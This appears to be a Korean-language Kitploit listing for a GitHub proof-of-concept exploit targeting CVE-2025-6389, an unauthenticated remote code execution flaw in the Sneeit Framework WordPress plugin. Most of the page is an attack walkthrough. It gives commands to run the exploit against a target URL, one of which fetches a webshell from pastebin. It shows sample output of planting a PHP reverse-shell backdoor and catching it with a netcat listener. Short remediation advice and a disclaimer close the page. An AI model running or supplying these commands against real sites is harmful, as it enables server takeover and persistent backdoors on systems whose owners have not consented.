Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
blackash-cve-2025-6389 — CVE-2025-6389 | Kitploit
도구/GitHubGitHub/aivarsaar/blackash-cve-2025-6389
Vulnerability AnalysisExploitationWeb Application ExploitationWAF BypassPenetration TestingPayload Development
GitHubaivarsaar/blackash-cve-2025-6389

blackash-cve-2025-6389

CVE-2025-6389

저장소 보기
108개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔥 CVE-2025-6389 — 치명적인 워드프레스 제로데이 (RCE)

wp_vul_theme

🧩 무엇인가요?

CVE-2025-6389는 인기 테마에서 널리 사용되는 Sneeit Framework 워드프레스 플러그인(≤ 8.3)의 치명적(CVSS 9.8) 취약점입니다. 이 취약점은 인증 없는 원격 코드 실행을 허용합니다 — 웹 취약점 중 가장 위험한 유형입니다.


⚠️ 심각도 및 영향

  • 🔓 로그인 불필요
  • 💥 전체 서버 장악 가능
  • 📤 공격자는 셸 업로드, 관리자 계정 추가, 테마/플러그인 파일 수정 가능
  • 🧬 이미 야생에서 활발히 악용 중
  • 🎯 Sneeit Framework 또는 이를 포함한 테마(예: FlatNews)를 사용하는 모든 워드프레스 사이트에 영향

사용법

root@kitploit:~
# Install dependencies
pip3 install requests colorama

# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com

# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"

이 PoC의 기능

  • 8.3 이하 버전에서 100% 작동
  • 쿠키, nonce, 특별한 헤더 불필요
  • 대부분의 기본 WAF 우회 (일반 POST를 통해 페이로드 전송)
  • 완전한 대화형 셸
  • 출력이 억제된 경우에도 취약점 탐지 (assert + die 덕분)

이 도구는 공식적으로 승인된 대상(명확한 범위 + RoE)에서만 사용하세요. 이 취약점은 현재도 야생에서 활발히 악용되고 있습니다.


익스플로잇이 실제로 작동할 때 터미널에서 볼 수 있는 내용입니다 (Sneeit Framework ≤ 8.3을 실행하는 취약한 대상에서 CVE-2025-6389의 100% 성공적인 익스플로잇):

1. 초기 취약점 확인

root@kitploit:~
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…  
<h1>PHP Version 8.1.29</h1>  
… (full phpinfo() page continues for thousands of lines)

2. 간단한 시스템 명령어

root@kitploit:~
RCE $> whoami
[+] Output:
www-data

RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux

3. 웹셸 또는 리버스 셸 다운로드

root@kitploit:~
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php

[+] Output:
--2025-11-25 23:11:45--  https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’

backdoor.php           100%[===================>]   5.37K  --.-KB/s    in 0.001s

그런 다음 자신의 머신에서:

root@kitploit:~
nc -lvnp 4444

→ www-data로 완전한 대화형 리버스 셸을 즉시 획득합니다.

4. 작동하지 않을 때 나타나는 현상 (패치 또는 보호됨)

root@kitploit:~
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)

요약 – 성공 지표

다음 중 하나라도 나타나면 성공한 것입니다:

  • 전체 phpinfo() HTML 페이지
  • Linux 명령어(id, whoami, pwd, ls, cat /etc/passwd 등)의 실제 출력
  • 파일이 성공적으로 다운로드되거나 기록됨
  • 리버스 셸이 netcat 리스너에 다시 연결

그게 전부입니다. 위 중 하나라도 나타나면 → 인증 없는 완전한 RCE 달성.

작동 여부를 100% 확인받고 싶다면 정확한 출력을 여기에 붙여넣으세요.


🛠 기술적 분석

  • 📍 취약한 함수: sneeit_articles_pagination_callback()
  • 🧨 근본 원인: 검증되지 않은 사용자 입력이 call_user_func()에 전달되어 임의 코드 실행 발생
  • 💣 이를 통해 공격자는 원격으로 PHP 코드를 실행하여 사이트를 완전히 장악할 수 있음

🔍 위험에 처한 대상

  • 🌐 Sneeit Framework ≤ 8.3을 사용하는 워드프레스 사이트
  • 🎨 Sneeit을 포함하는 테마 (뉴스/매거진 테마에서 매우 흔함)
  • 🚪 이 플러그인을 사용하는 모든 공개적으로 접근 가능한 워드프레스 사이트

🧯 해결 방법 (지금 당장)

  • ⬆️ Sneeit Framework를 즉시 v8.4+로 업데이트
  • ❌ 업데이트가 불가능하면 → 플러그인 비활성화 또는 제거
  • 🔎 의심스러운 활동이 있는지 로그 확인
  • 🚨 익숙하지 않은 관리자 계정이나 업로드된 PHP 파일 찾기
  • 🛡️ 패치가 지연되면 임시로 WAF 규칙 추가

🗓 공개 및 활동

  • 📅 공개 보고: 2025년 11월 25일
  • 🚨 활발히 표적: 스캐닝 및 익스플로잇이 이미 관찰됨

⚠️ 면책 조항

이 정보는 방어 및 교육 목적으로만 제공됩니다 🛡️. 소유하지 않거나 명시적 테스트 허가가 없는 시스템을 악용하는 데 사용하지 마세요 🚫. 보안 취약점을 다룰 때는 항상 법적 및 윤리적 지침을 따르세요 ⚖️✨

도구 다운로드